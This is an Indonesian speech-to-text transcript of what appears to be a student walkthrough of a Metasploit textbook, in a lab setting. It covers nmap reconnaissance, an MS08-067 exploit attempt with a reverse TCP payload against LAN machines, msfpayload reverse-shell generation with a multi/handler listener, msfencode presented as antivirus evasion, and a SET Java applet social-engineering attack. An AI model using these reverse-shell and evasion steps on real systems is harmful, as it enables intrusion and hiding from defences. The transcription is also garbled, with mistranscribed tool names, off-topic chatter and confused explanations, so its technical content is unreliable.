Metasploit Basic. Pada kali ini kami akan menjelaskan tentang basic-basic yang ada pada Metasploit. Sebelumnya, karena kami sudah menggunakan Kali Linux, maka kami tidak perlu menginstal Metasploit konsolnya. Perintah pertama yang akan dijalankan pada kali ini adalah MSF Console. Perintah MSF Console ini digunakan untuk menjalankan Metasploit Console. Ini sedang menunggu. Bisa dipercepat. Nah, di situ setelah kita memasukkan perintah MSF Console, maka akan keluar tampilan seperti itu. Ini artinya Metasploit konsolnya sudah berjalan. Nah, setelah Metasploit konsol tersebut berjalan, kita memasukkan perintah help connect. Perintah tersebut maka akan memunculkan option yang ada pada MSF tersebut. Nah, setelah help connect, kemudian kami memasukkan perintah exit untuk keluar dari MSF console tersebut. Nah, setelah kita keluar dari MSF console, kita akan masuk ke MSF CLI dengan memasukkan perintah MSF CLI -h. Sebelumnya, apa itu MSF CLI? MSF CLI merupakan antarmuka command line untuk kerangka kerja. Hal ini memungkinkan untuk menambahkan eksploitasi Metasploit ke script yang dibuat sendiri. Nah, setelah kita memasukkan perintah yang tadi, maka akan muncul mode-mode apa saja dan deskripsi sesuai dengan mode yang telah disediakan. Nah, sekarang kita akan menjalankan Armitage. Apa itu Armitage? Armitage adalah sebuah tool grafis untuk Windows dan Linux untuk manajemen serangan yang digunakan pada Metasploit yang mampu untuk memvisualisasikan target, merekomendasikan eksploitasi, dan memperlihatkan kemampuan melalui sebuah skema. Nah, itu tadi karena kita memasukkan perintah Armitage, maka akan muncul GUI-nya. Nah, di situ ada host dan port. Di situ adalah host dan port yang ingin kita tuju. Kemudian kita akan menjalankan MSF payload. Perintah yang dimasukkan adalah MSF payload -h. Kemudian apa itu MSF payload? MSF payload adalah sebuah komponen pada Metasploit yang memberikan kita sebuah shellcode, executable, dan kegunaan lainnya untuk exploit yang tidak disediakan pada framework. Shellcode ini bisa muncul melalui banyak format, yaitu C, Ruby, JavaScript, dan Visual Basic. Setiap format tersebut bisa digunakan untuk situasi tertentu. Selanjutnya menggunakan MSF encode. Kita masukkan perintah MSF encode -l. Sebelumnya dijelaskan dulu apa itu MSF encode. MSF encode adalah sebuah teknik encoding suatu file di mana dalam hal backdooring digunakan untuk backdoor yang kita buat agar tidak bisa terdeteksi oleh antivirus, sehingga bisa menyelesaikan rencana kita. Itu kita akan mengeksekusi MSF encode. Sedikit penjelasan mengapa memberikan perintah -l di belakang MSF encode. Perintah tersebut untuk menampilkan list encoder yang tersedia. Jadi semua yang muncul di situ adalah list
Kemudian lanjut ke bab 3, Intelligent Gathering. Pada Intelligent Gathering ini terdapat subbab Passive Information Gathering. Di sini kita bisa mendiscover ya, berarti menemukan informasi tentang target tanpa memasuki sistem mereka. Di sini contohnya menggunakan perintah whois. Kita memasukkan perintah whois. Nah, tujuannya adalah segmaniac.net. Perintah whois ini akan menampilkan domain server dari Segmaniac. Nah, di situ akan muncul semua informasi dari whois dari segmaniac.net. Di situ terdapat domain name, registrasi, servernya, dan informasi lainnya. Selanjutnya pada subbab netgraph. Kali ini kita akan menuju ke website tersebut dengan memasukkan alamat searchdns.netgraph.com. Pada website ini kita bisa menggunakan fiturnya untuk menemukan IP address sebuah server hosting sebuah website. Nah, di sini karena kita ingin mencari IP dari segmaniac.net, nah kita look up. Selanjutnya masuk kepada subbab netgraph. Di sini kita akan membuka website searchdns.netgraph.com. Nah, karena websitenya sudah terbuka, sebelumnya website ini adalah sebuah website yang menyediakan fitur untuk menemukan IP address sebuah server hosting sebuah website. Karena kita ingin mencari IP dari segmaniac.com, kita memasukkan segmaniac.com pada field tersebut, lookup. Di situ muncul hasil ya. Kita pilih yang paling atas. Nah, setelah kita pilih Segmaniac tersebut, muncul IP address server hostingnya. Untuk kita copy untuk kita uji pada perintah whois ya. Whois, kemudian IP tersebut kita jalankan. Nah, muncul semua informasi ya, muncul semua informasinya ya. Lanjut ke subbab berikutnya, nslookup. Perintah ini digunakan untuk mendapatkan informasi server. Karena di buku dijelaskan menggunakan backtrack, tapi sama saja dengan kali Linux. Kita memasukkan perintah nslookup, kemudian kita set tipenya mx. Website yang ingin kita dapatkan informasinya tetap segmaniac.com. Di situ akan muncul server IP-nya ya. Perintah-perintah yang sudah dijelaskan sebelumnya tadi itu adalah passive information gathering, yang sebenarnya tidak mudah dikuasai hanya dengan beberapa halaman saja, tetapi karena di buku dijelaskan seperti itu, kami menjelaskan sesuai buku terlebih dahulu. Masuk ke subbab selanjutnya, port scanning with Nmap. Nmap sebelumnya dijelaskan dulu apa itu Nmap. Nmap adalah aplikasi atau tool yang digunakan untuk port scanning. Jadi di sini kita
melakukan port scanning ya. Karena di sini ada PC yang dijadikan sebagai tumbal. Nah, kita akan men-scan PC tumbal tersebut. Kita memiliki IP PC tumbal tersebut 192.168.148. Kemudian kita memasukkan perintah untuk scanningnya nmap -ss -pn, kemudian memasukkan IP PC tumbal tersebut. Kita eksekusi. Nah, itu sudah muncul informasi dari hasil scanningnya. Di situ tampil PC Dell V4 dengan IP yang sudah dimasukkan seperti tadi. Kemudian MAC address-nya pun juga sesuai dengan PC tumbal. Setelah kita scanning dengan perintah tersebut, kita bisa scanning lagi dengan detail yang lebih lengkap dengan menambahkan -a. Jadi nmap -ss -pn -a juga dengan memasukkan IP PC tumbal. Kita eksekusi. Di situ sudah muncul detail informasi yang lebih lengkap karena tambahan perintah -a. Kemudian lanjut ke importing nmap result into Metasploit. Di sini jika kita ada kerjasama tim, maka kita bisa menggunakan perintah di bawah ini. Maksudnya kerjasama tim di sini kita bisa melakukan scanning bersama teman-teman kita pada waktu yang berbeda dan pada lokasi yang berbeda. Perintahnya yang dimasukkan adalah nmap -pn -ss -a -ox subnet. Nah, IP yang dimasukkan adalah IP itu 192.168.1.0/30. Kemudian setelah dieksekusi muncul informasi seperti yang tampil tersebut. Di sini terdapat perbedaan yaitu pada perintah -ox. Pada perintah -ox di sini gunanya untuk menampilkan file subnet 1.xml yang akan muncul pada home directory. Nah, di situ file subnet satunya sudah muncul. Lanjut ke subbab Advanced Nmap Scanning. Di sini maksudnya advance adalah kita melakukan scanning pada Advanced Nmap Scan method ini. Maksudnya adalah scanning idle TCP yang membolehkan kita scan semua target secara diam-diam dengan spoofing melalui IP address yang ada pada host jaringan tersebut. Di sini kita akan memasukkan sebelumnya kita harus masuk ke Metasploit dulu. Ya, karena kita sudah masuk ke Metasploit, langsung saja masukkan perintah
use auxiliary scanner IP ID sec. Ulang nggak tahu. Apa pinjam sepeda ini pinjam? Enggak, mau ulang lagi. Kemudian memasukkan perintah use auxiliary scanner IP ID sec seperti yang sudah dimasukkan pada video. Nah, setelah itu show option. Pada show option ini akan menampilkan opsi modul yang ada. Kemudian kita mengset host IP PC yang ingin dituju ya. IP PC ini tetap yang tadi 192.168.148. Kemudian kita set read-nya 50. Kita jalankan dengan perintah run. Nah, di sini terdapat peringatan cannot start device. Entah mengapa di sini tidak sesuai dengan panduan yang ada di buku, padahal ini PC-nya posisi connect, dua PC connect pada satu jaringan yang sama, tetapi tidak di situ tertuliskan no IP v4 address. Jadi kami juga bingung ini. Kemudian kita memasukkan perintah yang sama. Karena tadi tidak bisa, maka di sini set host 192.168.10/24. Kemudian set read-nya tetap 50. Kita jalankan dengan run. Nah, di sini juga muncul kasus yang sama, yaitu no IPv4 address assigned. Padahal PC sedang dalam keadaan connect. Masuk ke subbab port scanning with Metasploit. Selain kemampuan untuk menggunakan scanner pihak ketiga, Metasploit juga memiliki beberapa scanner port yang dibangun ke modul tambahan yang langsung terintegrasi dengan frameworknya. Di sini jika kita ingin melakukan port scanning menggunakan framework yang sudah disediakan oleh framework, maka kita bisa memasukkan perintah search port scan. Nah, setelah kita jalankan, maka akan menampilkan modul-modul yang ada. Nah, bisa dilihat pada itu. Selanjutnya kita melakukan scanning menggunakan Metasploit Scene Port Scanner. Di sini kita memberikan perintah set host IP urban 192.168.148. Kemudian kita set read-nya 50. Kemudian kita jalankan dengan perintah run. Selanjutnya ke subbab save message block scanning. SMB di sini digunakan untuk mengidentifikasi versi dari Windows dengan menggunakan SMB version module. Nah, di sini kita bisa memasukkan perintah use scanner /smb_version. Kemudian kita show options. Nah, di situ akan tampil opsi apa saja yang opsi-opsi apa saja yang terdapat pada Microsoft Windows, yaitu mulai dari nama, setting, require-nya, dan deskripsinya. Selanjutnya ke subbab FTP scanning. Di sini FTP scanning kita ingin mengidentifikasi
semua FTP server yang ada pada target. Sekarang kita masukkan perintah use connect /ftp version. Kemudian kita masukkan perintah show option. Di situ akan tampil opsi modul yang ada pada FTP. Kesimpulan pada bab ini, kita bisa memanfaatkan framework dari Metasploit untuk intelligent gathering yang dijelaskan pada PTES. Intelligent gathering ini juga membutuhkan banyak latihan dan pemahaman yang lebih mendalam tentang bagaimana sebuah organisasi dapat beroperasi. Dalam bab berikutnya kita akan melanjutkan ke langkah yang lebih penting, yaitu pada analisis kerentanan. Kita juga akan mengeksplorasi lebih banyak tentang contoh-contoh membuat modul sendiri, mengeksploitasi dan sekarang masuk ke bab 5, the joy of exploitation. Pada bab ini kita akan menjelaskan bagaimana eksploitasi itu. Eksploitasi adalah kemampuan untuk mendapatkan tarif penuh bagi mesin yang ditargetkan. Meskipun eksploitasi sudah maju, tetapi kita tidak bisa dengan mudah menggunakan pindah-pindah dasar untuk menyusup ke berbagai sistem dan keamanan jaringan. Kita masuk ke berita yang pertama, yaitu show exploits. Perintah show exploit tersebut digunakan untuk menampilkan exploit yang ada pada Metasploit framework. Kita bisa lihat di situ semua exploit yang disediakan. Kemudian perintah yang kedua, show auxiliary. Di sini kita bisa melihat modul-modul tambahan yang ada pada Metasploit yang dapat digunakan untuk banyak tujuan. Modul-modul tersebut bisa kita gunakan untuk scanner, denial of service, fuzzer, dan yang lainnya. Perintah ini selain menampilkan modul-modul tambahan juga menampilkan fitur yang ada. Kemudian selanjutnya perintah show option. Pilihan ini akan menampilkan pengaturan yang diperlukan untuk fungsi dari setiap modul. Itu kita bisa melihat opsi apa saja yang bisa kita gunakan, setting yang ada, dan deskripsinya. Selanjutnya kita masukkan perintah use Windows/smb/ms08_067_net API. Setelah kita jalankan perintah tersebut, maka kita akan masuk ke dalam exploit yang kita inginkan tadi, ms08_067_net API. Kemudian kita masukkan perintah back untuk kembali ke Metasploit-nya.
Untuk selanjutnya kita akan melakukan pencarian SQL. Kita masukkan perintah search ms SQL. Perintah ini bisa digunakan untuk melancarkan serangan terhadap SQL. Di situ akan tampil semua nama-nama dari SQL, ranking dengan deskripsinya. Ya. Itu akan tampil nama-namanya, ranking dengan lengkap dengan deskripsi dari semua SQL yang kita cari. Kemudian kita juga bisa mencari MS08067 dengan memasukkan perintah search MS08 underscore 067. Perintah ini digunakan untuk mencari exploit secara spesifik. Nah, di situ akan tampil MS08067 yang kita cari. Exploit itu ada pada Windows dengan tanggal yang sudah ada di situ, rankingnya grid, dan dengan deskripsi yang sudah disebutkan. Selanjutnya kita masuk kembali ke Windows SMB MS08067 yang tadi dengan memasukkan perintah use Windows /smb /ms08067 netapi. Ini sesuai yang kita cari sebelumnya. Setelah masuk ke dalam exploit tersebut, kita memasukkan perintah show option. Nah, perintah tersebut akan menampilkan semua opsi-opsi modul yang tersedia. Di situ terdapat iHost, iPod, dan SMB pipe, lengkap dengan deskripsinya masing-masing. Karena kita sudah mengetahui opsi-opsi modul yang kita inginkan, kita akan kembali ke Metasploit dengan memasukkan perintah back. Kemudian karena kita ingin menampilkan payload yang ada, kita memasukkan perintah show payload. Perintah ini akan menampilkan muatan-muatan yang ada pada platform yang ingin dikirimkan ke target. Nah, di situ sangat banyak payload yang tersedia, lengkap dengan ranking dan deskripsi masing-masing payload. Kita masuk lagi ke dalam exploit yang lebih spesifik, yaitu MS08 use
Dengan perintah yang sama, use SMB, use Windows SMB MS08 067 net API. Karena kita sudah masuk ke dalam exploit yang lebih spesifik, kita tampilkan show payloadnya. Di situ akan tampil semua payload yang sesuai dengan exploit MS0867 net API. Nah, di situ juga sama, ditampilkan nama, rankingnya, dan deskripsi masing-masing dari payload. Selanjutnya kita akan memasukkan payload sesuai dengan yang dijelaskan pada buku dengan perintah set payload Windows /cell/reverse unscript TCP. Di sini untuk memilih reverse TCP yang ada pada payload. Karena sudah memasukkan perintah tersebut, kemudian kita show option. Di situ akan tampil opsi modul yang tersedia, yaitu echoes sama echoes ekport SMB pipe. Ekportnya memiliki setting 445, SMB pipe-nya browser dan lengkap dengan deskripsi masing-masing dari opsi modul tersebut. Kemudian opsi payloadnya ada exit func, lhost, lport. Nah, di sini terdapat echoes dan lhost. Lhost adalah localhost, yaitu PC kita, sedangkan echoes adalah PC yang ingin kita kendalikan, remote host. Terdapat setting juga yang sudah sesuai dengan setiap payloadnya dan deskripsinya. Karena kita sudah selesai melihat opsi modul dengan opsi payloadnya, kita back untuk kembali ke Metasploit menu Metasploit utama. Kemudian kita ingin menampilkan semua targetnya, kita masukkan perintah show target. Salah. Berarti gak usah dipotong kan? Oh, masuk mana? Kanan gue gini. Ya. Nah, ngomongnya langsung sudah kan. Kemudian karena kita ingin menampilkan target apa saja yang mungkin bisa kita jang, kita memasukkan perintah show target. Di situ akan tampil semua target yang bisa kita serang dari ID dan name yang telah sesuai dengan target-targetnya. Windows XP, Windows 2003 dari setiap SP 1, SP 2 maupun SP 3. Ada sentri, dia datang Kemudian kita memasukkan perintah info. Perintah info ini digunakan untuk menampilkan deskripsi singkat dari modul yang disediakan. Di situ kita bisa melihat ya, info apa saja yang disediakan oleh
modul-modul tersebut. Oh siapa? Stop. Kemudian kita masuk ke dalam subbab exploiting your first machine. Di sini kita mengeksploitasi sebuah mesin. Kalau di buku dijelaskan mesin yang dijalankan adalah Windows XP SP2 atau Ubuntu 9. Tetapi kita mencoba untuk mengeksploit Windows 10. Karena kita sudah masuk ke dalam MSF konsolnya, kita langsung saja memasukkan perintah. Nah itu nmap min st min a min script smb check full min p0, kemudian IP PC yang ingin kita tuju. SD itu untuk menampilkan port, sedangkan A sedangkan untuk A menampilkan deskripsinya, kemudian check full untuk menampilkan mana yang ada kerentanan sistemnya. Kan gak aktif kan ya? Iya. Mana ya? Nah, sebelumnya kita sudah mencoba dapat host up. Ini berarti IP yang kita scan, yang di scan sih. Tadi ada. Berarti IP yang kita scan isinya ada. Kemudian MAC address-nya juga sesuai, juga terdapat penjelasan itu threshold-nya, juga ada penjelasan lainnya. Tetapi saat kita mencoba yang kedua kalinya muncul tampilan yang berbeda. Ngerain tapi ini bisa tak? Ya. Karena kita sudah selesai melakukan scanning, kita akan mencari net IP-nya. Ya, kita akan mencari sebuah exploit dengan memasukkan perintah search ms0807 net IP. Ini boleh ya. Di situ akan tampil exploit yang kita cari dengan nama exploit Windows SMB MS08607 net API, lengkap dengan info tanggal, ranking maupun deskripsinya. Ini kan pintar. Selanjutnya, karena kita sudah Masih mau kan menemukan exploit tersebut, kita gunakan exploit tersebut dengan memasukkan perintah use Windows SMB MS08067 net API. Setelah kita masuk ke dalam exploit tersebut, kita set payloadnya. Set payload Windows mepek reverse TCP.
Bantuan rampage, bangun terus rampage-nya sekali-kali lah. Setelah payloadnya di set, kita show targetnya dengan perintah show target. Di situ akan muncul semua target yang memungkinkan untuk kita serang dari ID dan namanya. Di situ ada Windows XP mulai dari SP1, SP2, SP3, kemudian ada Windows 2003 mulai SP1 dan SP2. Coba offset targetnya. oh iya Ini motonya di saat kena kan, kayak saat tadi kena. Di saat sistemnya kena, masih nggak kena tirane. Iya. Exploit-nya kan. sendiri. Misal ini kan sing ngeset kabeh. Iya itu sing ngasih. Nah itu Nah, iya gak gak iso kok. Tapi beda OS kan. Di set aja. Heeh. Pilih salah satu. Ini Inggris. dulu sing nomor 3 ta. Iki Nomor lima. Kemudian karena kita Iya benar. Kemudian karena kita ingin menyerang target yang kelima, yaitu Windows XP SP2 English NX, kita set targetnya 5 dengan ID 5. Setelah di set, kita set hostnya. Ini remote host yang kita tuju dengan IP tetap yaitu 10 34 243 206. Setelah hostnya di set, kemudian kita set lhostnya, yaitu PC yang kita gunakan sekarang, localhost. Nah, kita sebelumnya karena kita belum tahu IP-nya, kita cek IP PC yang kita gunakan sekarang. Karena pada jaringan yang sama, IP-nya 110 34 243 173. Setelah kita mengeset lhost, kita set lport-nya. Kita set 80 80. Setelah berhasil di set, kemudian kita show option. Di situ akan tampil opsi modul yang sudah kita set tadi. Di sini sudah muncul host yang ingin kita serang dengan IP yang sudah kita masukkan, dengan deskripsi target address, kemudian lhost yaitu PC yang kita gunakan sekarang dengan IP yang sudah kita masukkan. Nah, exploit targetnya dengan ID 5 dengan nama Windows XP SP2 English NX. Karena kita sudah berhasil mengkonfigurasi semua yang dibutuhkan, semua informasi yang dibutuhkan, kita akan siap untuk exploit. Kita masukkan perintah exploit. Di situ akan muncul exploit fail. Di sini terjadi fail karena pada pilihan OS yang muncul hanya Windows XP dan Windows 2003, sedangkan PC yang ditargetkan ini menggunakan Windows 10. Jadi exploit tidak berhasil. Terus iki salah itu di nganu gak OS. Iki file unreachable pedot jaringan. Oh, Gak tadi nyambung. jelas mengenai. Setelah dieksploit, di situ akan tampil exploit fail unreachable.
Peringatan di sini disebabkan oleh koneksi yang terputus. Di situ dijelaskan connection timeout. Astagfirullah. Sore Cara lain ini. sing Ubuntu. Podo Untuk kode lain. sitok iki Ya kok sih stop stop ya. Penutupan. terus motor. Kesimpulan pada bab 5 kali ini, kita berhasil mengeksploitasi mesin pertama. Namun karena koneksinya terputus, yang kita uji tidak bisa diselesaikan. Pada bab ini dijelaskan dasar-dasar eksploitasinya dan mengeset target yang didasarkan oleh fullnya ini adalah kerentanan. Untuk bab berikutnya kita akan membahas secara lebih lengkap dan lebih rinci. Selanjutnya masuk ke bab 6, Metacritic. Metacritic adalah session di mana hacker sudah dapat memasuki sistem korban atau target dan siap untuk mengontrol seluruh sistem yang ada di target atau korban. Metacritic ini adalah salah satu produk dari Metasploit dan digunakan setelah menemukan vulnerability jika sudah dieksploit. Sekarang kita masuk ke subbab scanning port dengan Nmap. Setelah kita masuk ke dalam MSF console, kita memasukkan perintah Nmap min st min a min po dan IP yang ingin dituju. Di sini IP yang ingin dituju adalah 10 34 243 200. Selanjutnya ke subbab scanning port with Nmap. Di sini kita akan melakukan scanning dengan Nmap. Perintah yang dimasukkan adalah Nmap min st min a min p0, kemudian IP yang ingin menjadi target. Di sini IP targetnya 10 34 243 200. Setelah sekian lama menunggu, maka akan muncul informasi dari target. Pokok aja. Di situ bisa kita lihat jika IP address sedang up dan lama scanning selama 79 detik. Sedikit penjelasan tentang Metacritic. Di sini kita bisa mengembangkan Metacritic sesuai dengan keinginan. Kita juga bisa mengeksperimen dan menggunakan Metacritic yang sudah kita buat sendiri. Di sini Metacritic bisa berkembang dengan dukungan script dan tambahan-tambahan lainnya. Untuk
pembelajaran tentang matematika yang lebih mendalam, kita bisa mempelajari pada bab-bab selanjutnya. Lanjut ke bab 7, voiding detection. Oh, jadi kok bisa 7 biji nih? Ketika kita melakukan penetration testing, kita pasti akan dicegah oleh fenomena seperti antivirus. Ini bisa kita abaikan dengan cukup mudah. Dia awet. Agar kita tidak menghindari antivirus tersebut, maka kita akan dianggap curiga oleh sistem yang sedang kita lakukan penetration testing. Maka pada bab 7 ini kita akan mencoba untuk mencegah antivirus mendeteksi apa saja yang kita lakukan pada penetration testing. Sebelum kita akan melakukan mematikan antivirus, mari kita mengetahui cara untuk membuat standalone metasploit binary dengan perintah msf pilot. Untuk permulaan, kita akan menciptakan sebuah reverse shell sederhana yang menghubungkan penyerang dan mengembalikan perintah shell. Kita akan menggunakan msf pilot dan windows shell dan windows dengan perintah msf payload spasi windows /shell _reverse _tcp spasi 0. Nah, untuk sekarang kita akan menjalankan perintah msf payload lagi dan menambahkan opsi yang dibutuhkan untuk membuat sebuah payload di Windows Portable Executable format. Nah, untuk perintahnya msf payload windows /shell _reverse _tcp lhost sama dengan IP kita. Nah, ini di PC kita memiliki IP 10.34.243.173. Setelah itu kita akan masukkan perintah lport sama dengan 31337 spasi X. Nah, untuk sekarang kita akan mencoba mengerjakan working executable dan dengan menjalankan modul multi handler di msf console. Untuk perintahnya kita akan masuk dulu ke Metasploit. Setelah masuk, kita akan mengetikkan perintah use exploit /multi/handler. Nah, setelah masuk, kita akan ketikkan perintah show option. Nah, itu untuk hasilnya. Jadi kita akan apa?
Wis. Untuk selanjutnya kita akan menjalankan perintah set payload windows slash cell underscore reverse underscore tcp. Kemudian kita akan masukkan perintah set lhost IP kita. Nah, setelah itu kita akan masukkan perintah set lport 31337. Nah, setelah tadi kita sudah men-setting semuanya, kita akan tampilkan show option. Nah, maka akan muncul nama ini dengan lhost, lport, current settingnya dengan IP kita, terus revertnya yes, descriptionnya bisa dibaca di sini. Salah satu cara terbaik untuk menghindari deteksi antivirus terhadap kita yaitu dengan cara kita mengencode payload kita dengan perintah msf encode. msf encode adalah sebuah alat yang berguna untuk mengubah kode ke dalam executable sehingga nampak beda oleh antivirus, tapi masih bisa dijalankan. Untuk perintahnya, kita akan masukkan perintah msf encode main.l. Kesimpulan pada tapi ini kan deteksi ya, menghindari deteksi antivirus. Wis makanan. Kamu nggak dipotong. Untuk kesimpulan pada bab ini, kita diberitahu bagaimana cara untuk mencegah deteksi antivirus. Namun dengan seiring berjalannya waktu, kita tidak bisa bekerja dengan perintah yang sama. Untuk solusinya, kita harus melakukan perubahan, yaitu dengan update metasploit. Jadi kita bisa menggunakan kode yang berbeda.
pada bab selanjutnya yaitu bab 10 kita akan membahas tentang social engineer toolkit. Nah, apa itu? Yaitu adalah nama suatu teknik pengumpulan informasi dengan memanfaatkan celah psikologi korban, atau mungkin boleh juga dikatakan sebagai penipuan. Social engineering membutuhkan kesabaran dan kehati-hatian agar sang korban tidak curiga. Kita dituntut untuk kreatif dan mampu berpikir seperti sang korban. Social engineering merupakan seni memaksa orang lain untuk melakukan sesuatu sesuai dengan harapan atau keinginan kita. Tentu saja pemaksaan yang dilakukan tidak secara terang-terangan atau di luar tingkah laku normal yang biasa dilakukan sang korban. Nah, pada bab 10 ini yaitu kita akan mengambil salah satu di subbabnya. Nah, kita akan mempraktekkan web attack di subbab Java Applet, karena dikarenakan di bab 10 ini terlalu banyak subbabnya. Nah, Java Applet sendiri yaitu serangan, salah satu vektor serangan paling sukses di set. Applet itu sendiri diciptakan oleh salah satu pengembang set yaitu bernama Thomas Webb. Serangan ini memperkenalkan Java Applet yang berbahaya, yaitu dengan melakukan deteksi browser secara cerdas, sehingga kita mengeksploitasi dan memberikan muatan untuk mesin target Java yang Java Applet tidak dianggap sebagai kerentanan oleh Java. Assalamualaikum.
Kesimpulan untuk bab 10 ini, serangan social engineering sekarang ini sedang meningkat, sehingga kita bisa menjamin pengujian faktor serangan menjadi sangat penting untuk setiap program keamanan. Social engineering pada umumnya membutuhkan keterampilan dan praktik. Penyerang yang baik tahu bahwa ia bisa memastikan serangan itu dibuat khusus untuk targetnya yang memiliki kelemahan dalam program yang dibuatnya. Seorang penyerang yang ahli akan tahu bagaimana dia menghabiskan waktunya dalam meneliti sebuah organisasi dengan melihat sosial media yang dimilikinya untuk menentukan apa yang bisa memicu seseorang tersebut agar dapat digunakan untuk melakukan serangan.